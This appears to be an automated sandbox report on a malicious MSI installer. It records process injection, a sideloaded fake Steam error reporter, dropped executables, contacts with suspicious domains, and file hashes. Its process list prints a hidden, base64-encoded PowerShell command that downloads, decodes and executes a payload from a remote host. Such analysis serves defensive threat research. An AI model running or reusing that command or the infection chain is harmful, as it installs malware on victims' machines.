Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3376 wrote to memory of 3816 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3376 wrote to memory of 3816 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3376 wrote to memory of 3816 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3816 wrote to memory of 4656 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3816 wrote to memory of 4656 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3816 wrote to memory of 4656 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3376 wrote to memory of 3144 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Uifie Public Co\JoisApp\UnRAR.exe
PID 3376 wrote to memory of 3144 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Uifie Public Co\JoisApp\UnRAR.exe
PID 3376 wrote to memory of 224 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Uifie Public Co\JoisApp\steamerrorreporter64.exe
PID 3376 wrote to memory of 224 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Uifie Public Co\JoisApp\steamerrorreporter64.exe
PID 224 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Roaming\Uifie Public Co\JoisApp\steamerrorreporter64.exe C:\Windows\SysWOW64\explorer.exe
PID 224 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Roaming\Uifie Public Co\JoisApp\steamerrorreporter64.exe C:\Windows\SysWOW64\explorer.exe
PID 224 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Roaming\Uifie Public Co\JoisApp\steamerrorreporter64.exe C:\Windows\SysWOW64\explorer.exe
PID 224 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Roaming\Uifie Public Co\JoisApp\steamerrorreporter64.exe C:\Windows\SysWOW64\explorer.exe
PID 1956 wrote to memory of 4876 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 4876 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 3708 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\cmd.exe
PID 1956 wrote to memory of 3708 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\cmd.exe
PID 1956 wrote to memory of 3708 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\cmd.exe
PID 1956 wrote to memory of 5104 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\cmd.exe
PID 1956 wrote to memory of 5104 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\cmd.exe
PID 1956 wrote to memory of 5104 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding DB47D37E721A829CE3F45FB14DA4A7BE

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss3F0F.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi3F0C.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr3F0D.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr3F0E.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Users\Admin\AppData\Roaming\Uifie Public Co\JoisApp\UnRAR.exe

"C:\Users\Admin\AppData\Roaming\Uifie Public Co\JoisApp\UnRAR.exe" x -p79d20ea766e8 "C:\Users\Admin\AppData\Roaming\Uifie Public Co\JoisApp\ruw9eigh.rar" "C:\Users\Admin\AppData\Roaming\Uifie Public Co\JoisApp\"

C:\Users\Admin\AppData\Roaming\Uifie Public Co\JoisApp\steamerrorreporter64.exe

"C:\Users\Admin\AppData\Roaming\Uifie Public Co\JoisApp\steamerrorreporter64.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe explorer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AbwBwAGUAbgBzAHUAbgAuAG0AbwBuAHMAdABlAHIALwAyADUAMAA1ADMALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAGIAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBoACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAbQAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHAAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB2ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEANgA3ACkAIAAtAGIAeABvAHIAIAAxADgAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\CBAKEBGIID.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\AKJKFBAFID.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
NL 23.62.61.72:443 www.bing.com tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 72.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 gay-domain.com udp
US 172.67.154.227:80 gay-domain.com tcp
US 172.67.154.227:443 gay-domain.com tcp
US 8.8.8.8:53 227.154.67.172.in-addr.arpa udp
US 8.8.8.8:53 gachi-lane.com udp
US 104.21.80.7:80 gachi-lane.com tcp
US 8.8.8.8:53 7.80.21.104.in-addr.arpa udp
US 8.8.8.8:53 run-df.com udp
US 172.67.150.206:80 run-df.com tcp
US 172.67.150.206:443 run-df.com tcp
US 8.8.8.8:53 opensun.monster udp
US 104.21.42.98:443 opensun.monster tcp
US 8.8.8.8:53 206.150.67.172.in-addr.arpa udp
US 8.8.8.8:53 replica-souls.com udp
US 172.67.139.60:443 replica-souls.com tcp
US 8.8.8.8:53 98.42.21.104.in-addr.arpa udp
BG 93.123.39.135:80 93.123.39.135 tcp
US 8.8.8.8:53 60.139.67.172.in-addr.arpa udp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 135.39.123.93.in-addr.arpa udp
US 8.8.8.8:53 emperorcom.ae udp
US 63.250.36.39:443 emperorcom.ae tcp
US 8.8.8.8:53 39.36.250.63.in-addr.arpa udp
US 8.8.8.8:53 32.25.90.104.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 160.83.221.88.in-addr.arpa udp
US 52.111.227.11:443 tcp
US 8.8.8.8:53 105.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 100.58.20.217.in-addr.arpa udp

Files

C:\Windows\Installer\MSI3AD6.tmp

MD5 b158d8d605571ea47a238df5ab43dfaa
SHA1 bb91ae1f2f7142b9099e3cc285f4f5b84de568e4
SHA256 ca763693cc25d316f14a9ebad80ebf00590329550c45adb7e5205486533c2504
SHA512 56aef59c198acf2fcd0d95ea6e32ce1c706e5098a0800feff13ddb427bfb4d538de1c415a5cb5496b09a5825155e3abb1c13c8c37dc31549604bd4d63cb70591

C:\Windows\Installer\MSI3C43.tmp

MD5 fb4665320c9da54598321c59cc5ed623
SHA1 89e87b3cc569edd26b5805244cfacb2f9c892bc7
SHA256 9fb3156c665211a0081b189142c1d1ab18cda601ee54d5f5d8883ecfa4177a59
SHA512 b205552a3cfbaa2202e6ef7e39e229af167b2342a7dc4a2f4cadfe4d05000966cf19e9e208e44d6bb0fd6a56f4283caeed9c13f523e5b301b87f79febb1840cf

memory/4656-28-0x00000000032A0000-0x00000000032D6000-memory.dmp

memory/4656-29-0x0000000005A00000-0x0000000006028000-memory.dmp

memory/4656-30-0x00000000059C0000-0x00000000059E2000-memory.dmp

memory/4656-32-0x0000000006240000-0x00000000062A6000-memory.dmp

memory/4656-31-0x0000000006120000-0x0000000006186000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aywtyskw.0f1.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4656-42-0x00000000063B0000-0x0000000006704000-memory.dmp

memory/4656-43-0x0000000006840000-0x000000000685E000-memory.dmp

memory/4656-44-0x0000000006880000-0x00000000068CC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\pss3F0F.ps1

MD5 30c30ef2cb47e35101d13402b5661179
SHA1 25696b2aab86a9233f19017539e2dd83b2f75d4e
SHA256 53094df6fa4e57a3265ff04bc1e970c10bcdb3d4094ad6dd610c05b7a8b79e0f
SHA512 882be2768138bb75ff7dde7d5ca4c2e024699398baacd0ce1d4619902402e054297e4f464d8cb3c22b2f35d3dabc408122c207facad64ec8014f2c54834cf458

memory/4656-46-0x00000000081B0000-0x000000000882A000-memory.dmp

memory/4656-47-0x0000000006DC0000-0x0000000006DDA000-memory.dmp

memory/4656-48-0x0000000007B30000-0x0000000007BC6000-memory.dmp

memory/4656-49-0x0000000007810000-0x0000000007832000-memory.dmp

memory/4656-50-0x0000000008830000-0x0000000008DD4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\scr3F0D.ps1

MD5 d4b8bc496cf855ed58e06057d746ae63
SHA1 027b241446c405a4dd0b2f11ff707419a60160b7
SHA256 ecf3115cdeae2636cd1b0d13d80b92e51908f7c561f8b6a1da105ac253b3490d
SHA512 a3592de4d167ddfb77d41e18b2b63579f180479a3b99237749087c415efb8c6a4bfabfc9016e7eeb9114377280f97a5d60f4519f1aa6f2222ab3017bcf4bfe86

memory/4656-52-0x0000000008DE0000-0x0000000008FA2000-memory.dmp

memory/4656-53-0x00000000094E0000-0x0000000009A0C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\msi3F0C.txt

MD5 61272a4ab9bf0a6ea76e28f2513726fa
SHA1 6027604a6bb09956c4b2d48a2d35470bfe86e39d
SHA256 1f432cbf91eda4097555450de475e90ea135477655bd33ef12609be369ba4754
SHA512 e309cd5c70df6303ac2c9528e487e01333504232fe8fc2d7bb0df1c5528fc2a5f5a6ce71bbd1ccffd727055dfb27019116f06b51945d34d72e2060563a480c17

C:\Config.Msi\e573a5c.rbs

MD5 9d6fe8fa5aa864ccfaca2a8792a30903
SHA1 223db57558b8e708eb82fc81596e6ab7eea7f854
SHA256 8a805c5766ab69aa4793eae266dfbcb04a1c337421c2a7f9580ccf6dfa6a7a06
SHA512 ff17dbf86a02eece904caac44b8d0da344df4a7a95222c5ae51768ad04af3da2b501c49b359452d24634d358a3a9ef08dd7cf8b188ca3533328e63f7038dbfae

C:\Users\Admin\AppData\Roaming\Uifie Public Co\JoisApp\UnRAR.exe

MD5 98ccd44353f7bc5bad1bc6ba9ae0cd68
SHA1 76a4e5bf8d298800c886d29f85ee629e7726052d
SHA256 e51021f6cb20efbd2169f2a2da10ce1abca58b4f5f30fbf4bae931e4ecaac99b
SHA512 d6e8146a1055a59cba5e2aaf47f6cb184acdbe28e42ec3daebf1961a91cec5904554d9d433ebf943dd3639c239ef11560fa49f00e1cff02e11cd8d3506c4125f

C:\Users\Admin\AppData\Roaming\Uifie Public Co\JoisApp\ruw9eigh.rar

MD5 2c55503160a465aa9571b5917e1cbc4c
SHA1 aa31f0375cfb36ab1db05cba4939f7871185663c
SHA256 e4b631cb165d69e8258ea5d93177cfb090e633f69a4233b1944d37ebb6d5c18b
SHA512 38e47553eca568ff12c3b4ca28f704ceddde5710cc40a794455e52bc610ecf631c41e68ae93681aa00ac3eae813cd806450cece60aded0c6f161c9173a89e4bc

C:\Users\Admin\AppData\Roaming\Uifie Public Co\JoisApp\steamerrorreporter64.exe

MD5 fd3ce044ac234fdab3df9d7f492c470a
SHA1 a74a287d5d82a8071ab36c72b2786342d83a8ef7
SHA256 0a0c09753b5103e86e32c2d8086dd1399f0d97a00e1525ec9c390067cdb242ba
SHA512 86d7e805fab0e5130003facbb1525ee261440846f342f53ae64c3f8d676d1208d5fd9bd91e3222c63cc30c443348eb5ddedab14c8847dae138fba7e9be69d08d

C:\Users\Admin\AppData\Roaming\Uifie Public Co\JoisApp\tier0_s64.dll

MD5 7e60404cfb232a1d3708a9892d020e84
SHA1 31328d887bee17641608252fb2f9cd6caf8ba522
SHA256 5a3e15cb90baf4b3ebe0621fa6f5f37b0fe99848387d6f2fd99ae770d1e6d766
SHA512 4d8abd59bd77bdb6e5b5e5f902d2a10fa5136437c51727783e79aed6a796f9ee1807faf14f1a72a1341b9f868f61de8c676b00a4b07a2a26cfb8a4db1b77eb3c

C:\Users\Admin\AppData\Roaming\Uifie Public Co\JoisApp\vstdlib_s64.dll

MD5 f26ff8df29170898c8facf87983d36a2
SHA1 cf4a335fdf129c9716e5bdcb128d5ab2d660f01f
SHA256 b95257da42a9c4932067f7cab10ccc047b0ff2616a384df3e716dbc24d8507fa
SHA512 4f42b9cb4d1de473a89c53e323f3fca1870af73667266f0803307482a2f708d09ed99e5249333501b258cb8898101146634cf8a241873d870767429c2d6d7cb0

C:\Windows\Installer\e573a59.msi

MD5 018608eea246419a1099d81b42918305
SHA1 80dc106adb71dbac9582cd7df099a818075f2947
SHA256 4cfa6da558a68a1f0a0ff4c8b029d4e8ebf9a406ed3e01f9b8099cd2b89f3e20
SHA512 57721772502585cc28cb8159e7cd44801fc843af4036de77302d7f153d9dc546e88903d73ff2bed8ecb3288f44fb21079ce3d3cce2912d5a3617bb933da5fd4d

memory/224-169-0x00000202B4570000-0x00000202B4571000-memory.dmp

memory/1956-171-0x00000000004A0000-0x00000000004C8000-memory.dmp

memory/1956-172-0x00000000004A0000-0x00000000004C8000-memory.dmp

memory/1956-173-0x00000000004A0000-0x00000000004C8000-memory.dmp

memory/4876-180-0x000002DB6E5D0000-0x000002DB6E5F2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 db8c8956d247b2ad1eae037588d1e98a
SHA1 c9d8d3d0c01af7169f6ba13bea2b19b537c73aa8
SHA256 9edc885e57bb085ffaa52e37eba4b6ab981efc3727bef2cc76d466f4c67b4975
SHA512 07e1b36eda68d4c317237d6d0179d3ec5626324f0e19b2217356a342d24d1fec9a54fc8e551b006148e650bcbcc76c3dcb64790b5d93e2ced7060e9b1d1a660c

memory/4876-197-0x000002DB6E920000-0x000002DB6E93C000-memory.dmp

memory/4876-222-0x000002DB6ED50000-0x000002DB6EF12000-memory.dmp

memory/4876-223-0x000002DB6F450000-0x000002DB6F978000-memory.dmp

memory/1956-229-0x0000000061E00000-0x0000000061EF3000-memory.dmp

memory/1956-267-0x00000000004A0000-0x00000000004C8000-memory.dmp

C:\ProgramData\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

C:\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

memory/1956-297-0x00000000004A0000-0x00000000004C8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CBAKEBGIID.exe

MD5 4845f01eaa8068384625e302e9a4eb05
SHA1 fb6ff8293fa45e17ba97f84954e7d1d5b0d38f87
SHA256 8a482f2271a42c5f54c96e816a84340a6f2357a5b81f927d07d00788f5140a41
SHA512 bb58f2438524b518b19f2b74c5d598460735958f77c310ba3710520d1d88ce7975449977c9965dbca87cd6a824c8ab82e56bea6d571d79594079f0a0ea404d77